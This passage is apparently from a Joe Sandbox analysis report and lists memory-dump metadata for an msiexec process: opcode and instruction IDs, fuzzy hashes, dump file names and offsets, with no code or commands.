                                                                                              • Opcode Fuzzy Hash: f0d81a84dc70a50f181f12cf1691da8f58c7b439e805297052226ef549ba2bc3
                                                                                              • Instruction Fuzzy Hash: 38313934E10615DFCB09CFA4C49469EBBF6BF89300F108529E816EB351EB75AD428B50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2c0085d9f3afda1d55bd13edb6a3819f1384c3bdf3a409156b714f9e1e9e2d1e
                                                                                              • Instruction ID: 2d768f5dc1cd059942177027b8acd274139a9df203080543c129a45bcc14e1e7
                                                                                              • Opcode Fuzzy Hash: 2c0085d9f3afda1d55bd13edb6a3819f1384c3bdf3a409156b714f9e1e9e2d1e
                                                                                              • Instruction Fuzzy Hash: 15313A34E10619DBCB09CFA4C494A9EB7F7BF89700F108529E81AEB341EB75AC418B90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a50085bc4f2f0f26e94ed907a333d71fa29abd04df5d510f7d6a749b925ad673
                                                                                              • Instruction ID: 2525ce10e5bd1edb3faf22f3d8edba1eb8a817005065aa0f28cb1514fef2a6b8
                                                                                              • Opcode Fuzzy Hash: a50085bc4f2f0f26e94ed907a333d71fa29abd04df5d510f7d6a749b925ad673
                                                                                              • Instruction Fuzzy Hash: 28218D75F02205DFDB11CF79C881A9EBBF6BB88610F148069E905E7350EB39E9409B94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7549ffdb5c65663de52e030d786a2c3e5b124ee27e44ecbb4218667891c76c7d
                                                                                              • Instruction ID: 081cd69363ad267997fbfeede5e8f166b2d42c66d9d73fc599fa005a3ea4abe3
                                                                                              • Opcode Fuzzy Hash: 7549ffdb5c65663de52e030d786a2c3e5b124ee27e44ecbb4218667891c76c7d
                                                                                              • Instruction Fuzzy Hash: 7F214F75F02215DFDB10CF7DC841A9EB7F6BB88610F108025EA05E7340DB39E9409B94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2e98831548feea08c2048fc884075e3758e30e4b8e682045dec8e4f362ef7196
                                                                                              • Instruction ID: 3def991c1ef8fc52a44e6845c1f1804a6f078df239ace602f8d6d0e4356d520d
                                                                                              • Opcode Fuzzy Hash: 2e98831548feea08c2048fc884075e3758e30e4b8e682045dec8e4f362ef7196
                                                                                              • Instruction Fuzzy Hash: 2321C234B02109DBDB04DA69E59468EBBE7FF88214F148429E409DB341D738ED158BD0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2656218096.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_c4d000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a85e945a36141a852be04c4098581cb01e0f8304ec6b5ec57f4dec67c7f23cc3
                                                                                              • Instruction ID: 16fb9267c46bdb70b7b0ff52d49832aa1d8a7ec3bb1e54707d041a006c731363
                                                                                              • Opcode Fuzzy Hash: a85e945a36141a852be04c4098581cb01e0f8304ec6b5ec57f4dec67c7f23cc3
                                                                                              • Instruction Fuzzy Hash: 9321F275604304DFDB14EF14D984B26BBA1FB84324F34C56DD84A4B246C37AD847CB62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 434ac6af82f6f25e8f77787042bf0758eb43e78e88ec384ae7814295a5de84d4
                                                                                              • Instruction ID: c0bfbdbe4b29ef20769ac82e927e35070be79af6d0e876e40e69e319d63cb6f5
                                                                                              • Opcode Fuzzy Hash: 434ac6af82f6f25e8f77787042bf0758eb43e78e88ec384ae7814295a5de84d4
                                                                                              • Instruction Fuzzy Hash: E4116135B011298BDB59DA79D814A9E77EBFBCC710B048539D50AE7340EE39ED018BE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 72102a72c6474a5a53e6967d53e51af975acd027133a51ebed07e93762185c61
                                                                                              • Instruction ID: 6ee2eccf74a79c69539efebd917daf809e6f037110be6c6d6fefff22d8efb7fc
                                                                                              • Opcode Fuzzy Hash: 72102a72c6474a5a53e6967d53e51af975acd027133a51ebed07e93762185c61
                                                                                              • Instruction Fuzzy Hash: 5111DB30B012599FEB15D624D95079E7BE7EB8A304F0044BAD50DDB341DB35AE428BE2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4acf50704c043959213785c4c7c003f52d5157ba416a1f75cdbf61b7c151f7ff
                                                                                              • Instruction ID: d077a542035ffa6d7c068cb65c222432d3f7b93cb445282c6b433e88d57d4ea2
                                                                                              • Opcode Fuzzy Hash: 4acf50704c043959213785c4c7c003f52d5157ba416a1f75cdbf61b7c151f7ff
                                                                                              • Instruction Fuzzy Hash: CA014531B011559FCB568679CC1069F3BEBEBCD300F04457AD906E7251EE28AD0187E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 03c60f95071d86fe677b09682b9dae71ad1dff0f740461b45b97b9378f42bc1b
                                                                                              • Instruction ID: 0d39de340fef691c39d4200b0363d85b40d2787f161b4b60a490680b8f98e162
                                                                                              • Opcode Fuzzy Hash: 03c60f95071d86fe677b09682b9dae71ad1dff0f740461b45b97b9378f42bc1b
                                                                                              • Instruction Fuzzy Hash: 2321F2B1D01219AFCB10CF9AD880ACEFBF4FB49310F10812AE918A7340C378A554CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c222c5bb2dcc2773b709f5d78c649ec8d01c1543a73b24161729a16d4f18c469
                                                                                              • Instruction ID: 1c404a8c7bb740151faf6b1a7230ec554df25c308f830b9603215cf9975ef95f
                                                                                              • Opcode Fuzzy Hash: c222c5bb2dcc2773b709f5d78c649ec8d01c1543a73b24161729a16d4f18c469
                                                                                              • Instruction Fuzzy Hash: FD01B5307022518FD706D679995170B77E7EB8B610F10447AE94EDB352DB29ED0287E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2656218096.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_c4d000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 66947004780a97a0a9ffc7f912e5d94c3df056903282c74f31bf3d8b4358d861
                                                                                              • Instruction ID: 6c624fed46d0f499b7392e77425558d33830c542e69714b29e8fb2d2830fa16a
                                                                                              • Opcode Fuzzy Hash: 66947004780a97a0a9ffc7f912e5d94c3df056903282c74f31bf3d8b4358d861
                                                                                              • Instruction Fuzzy Hash: 8B11DD75504284CFCB11DF14D5C0B15FBB1FB84324F28C6AED84A4B656C33AD84ACB62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 985c63b566ce522b0c936dde7ef61e4abdae1118d04e5058a0789b5c6a6d04ff
                                                                                              • Instruction ID: d6b0456053be7e88162c49dc9ab8b3cc2a7d566b07b11b4aa1531b16d891a1b7
                                                                                              • Opcode Fuzzy Hash: 985c63b566ce522b0c936dde7ef61e4abdae1118d04e5058a0789b5c6a6d04ff
                                                                                              • Instruction Fuzzy Hash: 2B01AD327020209BD72A95ADD45071BB7CBEBC9710F20883AE50ECB382DE69ED4247A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 801a33ed99bf0a8a5ea1f7ea8b05ce32e0a7877484f9e9b97d94dd32245f1b3c
                                                                                              • Instruction ID: 4bd6cd179d7575225b071170ac819309e485fe229cbacfde62759b7505d039d1
                                                                                              • Opcode Fuzzy Hash: 801a33ed99bf0a8a5ea1f7ea8b05ce32e0a7877484f9e9b97d94dd32245f1b3c
                                                                                              • Instruction Fuzzy Hash: 1411C2B1D012599FCB10DF9AD884ACEFBB4FB48710F50812AE918A7340C3786554CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 62ddd9dab5f4a079c932b87519f36940ff3b800b6921dc8bbe5848e5a8cd0ae3
                                                                                              • Instruction ID: 3cfe4c7c534d10b576c3c54a8bee011e7fb45c77862d3c2c8b036176744c92a1
                                                                                              • Opcode Fuzzy Hash: 62ddd9dab5f4a079c932b87519f36940ff3b800b6921dc8bbe5848e5a8cd0ae3
                                                                                              • Instruction Fuzzy Hash: A80181327020218BD72A95BDD45571BB7DBEBC9710F20883AE50ECB386DF69ED4247A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 954f681a77e88b134285d8f013aa8ba1442b7d90ab3061882bfe1a835a53705d
                                                                                              • Instruction ID: a6f70082e99ab8e889cb852cdb55b50e175d412aa74e2b55e6b327d57d71a7a3
                                                                                              • Opcode Fuzzy Hash: 954f681a77e88b134285d8f013aa8ba1442b7d90ab3061882bfe1a835a53705d
                                                                                              • Instruction Fuzzy Hash: 6D016D307021118FD705DA68D56071B73D7EB8EA10F108839E90ECB355DE2AFD028791
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 680ec35603117ba48c53eec5323ebea9dea46d56c88db9e37fa3479407c28cb3
                                                                                              • Instruction ID: 9ed68b97118408404b87e5693c8119020d8e158cfaf68b66a0d2be7fecf4aa5a
                                                                                              • Opcode Fuzzy Hash: 680ec35603117ba48c53eec5323ebea9dea46d56c88db9e37fa3479407c28cb3
                                                                                              • Instruction Fuzzy Hash: A6F065A1D06344EFDB01CBB099456497FAEEB47309F1588EAD449DB113E239CB058760